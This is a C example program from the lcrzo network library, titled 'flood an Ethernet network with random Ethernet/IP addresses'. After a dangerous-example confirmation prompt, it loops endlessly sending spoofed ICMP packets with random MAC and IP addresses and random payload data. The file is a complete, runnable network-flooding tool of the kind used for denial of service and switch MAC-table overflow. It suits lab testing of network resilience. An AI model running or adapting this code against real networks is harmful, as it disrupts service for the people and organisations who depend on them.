
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000369=
{ /*reference*/     "lcrzoex", 369,
  /*version*/       1, 0,
  /*title*/         "flood an Ethernet network with random Ethernet/IP addresses",
  /*french title*/  "floode un reseau Ethernet avec des adresses Ethernet/IP aleatoires",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "device",
  /*french usage*/  "device",
  /*usage example*/ "eth0",
  /*fr. usage ex.*/ "eth0",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declaration */
int lcrzoex_000369_main(int argc, char *argv[]);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000369_main(int argc, char *argv[])
{ lcrzo_device device;
  lcrzo_spoof spoof;
  lcrzo_hdrleth hdreth;
  lcrzo_hdrlip hdrip;
  lcrzo_data data;
  lcrzo_int32 datasize, i; 

  lcrzo_init();
  if ( argc<2 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000369, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize device */
  lcrzo_epr(shared_para_device_init_src(argv[1], device));

  /* ask user if he really wants to continue */
  lcrzo_epr(shared_misc_dangerousexample());

  /* init spoof */
  lcrzo_epr(lcrzo_spoof_init(&spoof));

  /* create the new Ethernet header */
  lcrzo_epr(lcrzo_hdrleth_initdefault(&hdreth));
  hdreth.type=LCRZO_HDRLETH_TYPE_IP;

  /* create the new IP header */
  lcrzo_epr(lcrzo_hdrlip_initdefault(&hdrip));
  hdrip.protocol=LCRZO_HDRLIP_PROTOCOL_ICMP;

  /* init fake data */
  datasize=1400;
  lcrzo_epr(lcrzo_data_initm_rand(0, 0xFF, datasize, &data, &datasize));

  /* initialize spoof */
  lcrzo_epr(lcrzo_spoof_init(&spoof));
  lcrzo_epr(lcrzo_spoof_set_printbeforesending(&spoof, LCRZO_FALSE));

  /* main loop */
  while (LCRZO_TRUE)
  { /* set false addresses */
    for ( i=0 ; i<LCRZO_ETHA_MAXBYTES ; i++ )
    { lcrzo_er(lcrzo_uint8_init_rand(1, 0xFE, &(hdreth.src[i])));
    }
    for ( i=0 ; i<LCRZO_ETHA_MAXBYTES ; i++ )
    { lcrzo_er(lcrzo_uint8_init_rand(1, 0xFE, &(hdreth.dst[i])));
    }
    lcrzo_er(lcrzo_uint32_init_rand(0, 0xFFFFFFFFu, &hdrip.saddr));
    lcrzo_er(lcrzo_uint32_init_rand(0, 0xFFFFFFFFu, &hdrip.daddr));
    /* spoof */
    lcrzo_epr(lcrzo_spoof_ethipoptdata(&spoof, device, 
				       hdreth, hdrip, NULL, 0,
				       data, (lcrzo_uint16)datasize));
  }

  /* close everything */
  lcrzo_epr(lcrzo_data_free2(&data));
  lcrzo_epr(lcrzo_spoof_close(&spoof));
  lcrzo_close();
  return (LCRZO_ERR_OK);
}

